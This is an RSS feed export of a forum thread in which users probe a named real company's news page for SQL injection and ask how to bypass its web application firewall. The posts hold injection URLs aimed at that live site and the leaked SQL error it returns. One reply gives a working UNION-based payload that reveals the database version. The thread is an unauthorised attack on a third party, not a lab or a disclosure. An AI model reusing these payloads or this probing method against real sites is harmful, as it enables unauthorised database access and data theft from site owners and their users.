<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>how to inject this bug?</title>
        <description>http://www.clearviewgroup.ca/news.php?newsid=16


http://www.clearviewgroup.ca/news.php?newsid=16-- work well
http://www.clearviewgroup.ca/news.php?newsid=-16-- error in 

http://www.clearviewgroup.ca/news.php?newsid=16 order by 1--
&amp;quot;
INVALID SQL: 1054 : Unknown column '20order' in 'where clause'
SQL QUERY FAILURE: SELECT title, postdate, content FROM ht_news WHERE id = 16%20order%20by%201-- 
&amp;quot;
how to bypass it ?</description>
        <link>http://sla.ckers.org/forum/read.php?16,47205,47205#msg-47205</link>
        <lastBuildDate>Fri, 24 May 2013 12:05:42 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,47205,47218#msg-47218</guid>
            <title>Re: how to inject this bug?</title>
            <link>http://sla.ckers.org/forum/read.php?16,47205,47218#msg-47218</link>
            <description><![CDATA[Sorry! I cann't get table_names......]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 18 Apr 2012 21:21:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,47205,47216#msg-47216</guid>
            <title>Re: how to inject this bug?</title>
            <link>http://sla.ckers.org/forum/read.php?16,47205,47216#msg-47216</link>
            <description><![CDATA[Siiick... this WAF was very hard! I try to bypass it for on day!!!]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 18 Apr 2012 17:45:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,47205,47215#msg-47215</guid>
            <title>Re: how to inject this bug?</title>
            <link>http://sla.ckers.org/forum/read.php?16,47205,47215#msg-47215</link>
            <description><![CDATA[http://www.clearviewgroup.ca/news.php?newsid=(-16)UNION(SELECT+version(),2,3)--<br />
<br />
5.5.14 <br />
<br />
thanks to m4rkz...]]></description>
            <dc:creator>Razor4x</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 18 Apr 2012 12:17:05 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,47205,47205#msg-47205</guid>
            <title>how to inject this bug?</title>
            <link>http://sla.ckers.org/forum/read.php?16,47205,47205#msg-47205</link>
            <description><![CDATA[http://www.clearviewgroup.ca/news.php?newsid=16<br />
<br />
<br />
http://www.clearviewgroup.ca/news.php?newsid=16-- work well<br />
http://www.clearviewgroup.ca/news.php?newsid=-16-- error in <br />
<br />
http://www.clearviewgroup.ca/news.php?newsid=16 order by 1--<br />
&quot;<br />
INVALID SQL: 1054 : Unknown column '20order' in 'where clause'<br />
SQL QUERY FAILURE: SELECT title, postdate, content FROM ht_news WHERE id = 16%20order%20by%201-- <br />
&quot;<br />
how to bypass it ?]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 18 Apr 2012 05:57:13 -0500</pubDate>
        </item>
    </channel>
</rss>
